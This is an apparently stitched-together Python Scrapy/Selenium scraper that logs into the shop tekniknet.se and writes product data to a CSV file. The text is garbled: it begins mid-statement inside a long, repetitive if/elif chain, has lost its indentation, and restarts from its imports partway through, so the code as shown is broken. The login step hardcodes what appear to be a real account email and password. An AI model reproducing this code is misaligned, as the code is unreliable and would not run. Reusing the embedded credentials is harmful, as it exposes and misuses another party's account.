csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 14:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 15:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 16:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 17:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +
list3[k] + '\n')
elif len(csv_image_url) >= 18:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + csv_image_url[17] + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error3')
for m in range(0, len(list4)):
try:
if list4[m] not in old_product_url:
self.loggger.info('********************** ' + str(
k) + ' ******************************')
self.driver.get(list4[m])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading4 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock4 non-exist')
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price4 non-exist')
csv_price_new = ''
csv_price_old = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description4 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number4 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image4 non-exist')
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 14:
import scrapy
import time
import os.path
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from tempfile import mkstemp
from shutil import move
from os import fdopen, remove
from datetime import datetime
import logging
output_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')
log_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)
class ProductSpider(scrapy.Spider):
name = "tekniknet_new"
allowed_domains = ['www.tekniknet.se']
start_urls = ['https://www.tekniknet.se/#']
def __init__(self):
# self.driver = webdriver.Chrome("./chromedriver.exe")
options = webdriver.ChromeOptions()
# options.add_argument("--headless")
options.add_argument("--start-maximized")
self.driver = webdriver.Chrome(chrome_options=options)
def parse(self, response):
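        """Log in to tekniknet.se, walk the category tree, and append every
        product not already present in tekniknet.csv as a 'NEW' row."""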
# Quiet down all the unnecessary logging.
fh = logging.FileHandler(log_output_file)
fh.setLevel(logging.INFO)
logging.getLogger('selenium.webdriver.remote.remote_connection').setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote.remote_connection').addHandler(fh)
logging.getLogger('urllib3.connectionpool').addHandler(fh)
logging.getLogger().addHandler(fh)
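        # 'loggger' (three g's) is kept as-is: scrapy.Spider already exposes a
        # read-only 'logger' property, so assigning to self.logger would fail.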
self.loggger = logging.getLogger()
self.driver.get(response.url)
list1 = []
list2 = []
list3 = []
list4 = []
list5 = []
list3_categories = []
list4_categories = []
csv_categories1 = ''
csv_heading = ''
csv_stock = ''
csv_price_new = ''
csv_price_old = ''
csv_desc = ''
csv_article_number = ''
# article_number_list = []
csv_image_url = []
# file_exist = False
old_product_url = []
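        # Log in first; the product pages are scraped under this authenticated
        # session.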
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'email')))
username = self.driver.find_element_by_id('email')
username.send_keys("info@themobilestore.se")
        password = self.driver.find_element_by_id('password')
        password.send_keys("order88")
login = self.driver.find_element_by_class_name('button-confirm')
login.click()
time.sleep(5)
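        # Downgrade every 'NEW' marker left by the previous run to 'old', so
        # the rows appended below are the only ones flagged 'NEW'.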
#Create temp file
        tmp_fd, abs_path = mkstemp()
        with fdopen(tmp_fd, 'w') as new_file:
with open("tekniknet.csv") as old_file:
for line in old_file:
new_file.write(line.replace('NEW', 'old'))
#Remove original file
remove("tekniknet.csv")
#Move new file
move(abs_path, "tekniknet.csv")
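        # Collect the product URLs already in the CSV (last column of each row)
        # so previously scraped products can be skipped below.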
with open('tekniknet.csv', 'r') as ins:
for line in ins:
                old_product_url.append(line.split(',')[-1].strip())
file = open("tekniknet.csv", "a", errors ='replace')
# file.write('OLD/NEW' + ',' + 'article number' + ',' + 'category1' + ',' + 'category2' + ',' + 'category3' + ',' + 'heading' + ',' + 'description' + ',' + 'current price' + ',' + 'previous price' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'EAN code' + ',' + 'stock' + ',' + 'product url' + '\n')
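        # Each written row follows a fixed layout (see the commented header
        # above): status, article number, three category levels, heading,
        # description, two prices, 18 image-link slots (blanks written as a
        # single space), a blank EAN column, stock, and the product url.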
for wrapper1 in self.driver.find_elements_by_class_name('level-0'):
child_wrapper1 = wrapper1.find_element_by_xpath('./a')
link1 = child_wrapper1.get_attribute('href')
list1.append(link1)
self.loggger.info('*************************************************')
self.loggger.info(link1)
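        # The last four top-level links are skipped; presumably they are
        # non-category entries (the -4 bound is inherited from the original
        # range expression).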
for i in range(0, len(list1)-4):
self.driver.get(list1[i])
try:
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'inner')))
for wrapper2 in self.driver.find_elements_by_class_name('inner'):
try:
sub2 = wrapper2.find_element_by_class_name('subLinks')
child_wrapper2 = sub2.find_elements_by_xpath('.//a')
for child2 in child_wrapper2:
link2 = child2.get_attribute('href')
list2.append(link2)
self.loggger.info('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')
self.loggger.info(link2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
except:
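                # No 'inner' menu on this category page: fall back to the
                # categorySubCategories block, and failing that treat the page
                # as a product listing directly.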
try:
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'categorySubCategories')))
subcategory = self.driver.find_element_by_id('categorySubCategories')
wrapper2_1 = subcategory.find_elements_by_xpath('.//a')
for child3 in wrapper2_1:
link2_1 = child3.get_attribute('href')
list5.append(link2_1)
for n in range(0, len(list5)):
self.driver.get(list5[n])
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'categorySubCategories')))
subcategory = self.driver.find_element_by_id('categorySubCategories')
wrapper2_1_1 = subcategory.find_elements_by_xpath('.//a')
for child3_1 in wrapper2_1_1:
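                            # 'Visa alla' is Swedish for 'Show all'; skip that
                            # aggregate link and keep only real subcategory links.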
if child3_1.text != 'Visa alla':
link2_1_1 = child3_1.get_attribute('href')
list2.append(link2_1_1)
except:
try:
breadcrumbs2 = self.driver.find_element_by_id('breadcrumbs')
categories2 = breadcrumbs2.find_elements_by_xpath('.//li')
csv_categories2 = ''
for category2 in categories2:
csv_categories2 = csv_categories2 + category2.text + '/'
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'listProduct')))
for wrapper2_2 in self.driver.find_elements_by_class_name('listProduct'):
wrapper2_3 = wrapper2_2.find_element_by_xpath(".//a")
link2_2 = wrapper2_3.get_attribute('href')
list4.append(link2_2)
list4_categories.append(csv_categories2)
self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')
self.loggger.info(link2_2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
        # To scrape only a few category pages, bound the range, e.g. range(0, 5);
        # range(0, len(list2)) walks every collected category page.
for j in range(0, len(list2)):
try:
self.loggger.info('**********-------------- ' + str(j) + ' ******************************')
self.driver.get(list2[j])
WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))
breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')
categories1 = breadcrumbs1.find_elements_by_xpath('.//li')
csv_categories1 = ''
for category1 in categories1:
csv_categories1 = csv_categories1 + category1.text + '/'
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'listProduct')))
for wrapper3 in self.driver.find_elements_by_class_name('listProduct'):
child_wrapper3 = wrapper3.find_element_by_xpath(".//a")
link3 = child_wrapper3.get_attribute('href')
list3.append(link3)
list3_categories.append(csv_categories1)
self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')
self.loggger.info(link3)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
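        # Visit each product page collected from the subcategory listings and
        # extract its fields; URLs already present in the CSV are skipped.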
for k in range(0, len(list3)):
try:
if list3[k] not in old_product_url:
self.loggger.info('----------------------- ' + str(k) + ' ******************************')
self.driver.get(list3[k])
WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))
# breadcrumbs = self.driver.find_element_by_id('breadcrumbs')
# categories = breadcrumbs.find_elements_by_xpath('.//a')
# for category in categories:
# csv_categories.append(category.text)
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading3 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
                        csv_stock = 'Out of stock'
                        self.loggger.info('stock3 non-exist')
try:
price_new = offer.find_element_by_class_name('priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name('priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name('priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price3 non-exist')
csv_price_old = ''
csv_price_new = ''
try:
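                        # Commas and newlines are stripped from the description
                        # because rows are written below without CSV quoting.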
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\n', ' ').replace('\r', '').rstrip().lstrip()
except:
self.loggger.info('description3 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id('pManufacturer')
csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')
except:
self.loggger.info('article number3 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image3 non-exist')
######################################### CSV File Writing #########################################
# if csv_article_number not in article_number_list:
                    if csv_image_url:
                        # Pad the image URLs to the fixed 18 image columns
                        # (blank columns are written as a single space), then
                        # append the blank EAN column, stock and product url.
                        padded_images = (csv_image_url + [' '] * 18)[:18]
                        row = (['NEW', csv_article_number,
                                list3_categories[k].split('/')[1],
                                list3_categories[k].split('/')[2],
                                list3_categories[k].split('/')[3],
                                csv_heading, csv_desc,
                                csv_price_new, csv_price_old]
                               + padded_images
                               + [' ', csv_stock, list3[k]])
                        file.write(','.join(row) + '\n')
# article_number_list.append(csv_article_number)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error3')
        # To scrape only a few products, bound the range, e.g. range(0, 20);
        # range(0, len(list4)) visits every product collected in list4.
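        # Same per-product extraction as above, for products found directly on
        # category listing pages (list4).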
for m in range(0, len(list4)):
try:
if list4[m] not in old_product_url:
                    self.loggger.info('********************** ' + str(m) + ' ******************************')
self.driver.get(list4[m])
WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))
# breadcrumbs = self.driver.find_element_by_id('breadcrumbs')
# categories = breadcrumbs.find_elements_by_xpath('.//a')
# for category in categories:
# csv_categories.append(category.text)
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading4 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock4 non-exist')
try:
price_new = offer.find_element_by_class_name('priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name('priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name('priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price4 non-exist')
csv_price_new = ''
csv_price_old = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\n', ' ').replace('\r', '').rstrip().lstrip()
except:
self.loggger.info('description4 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id('pManufacturer')
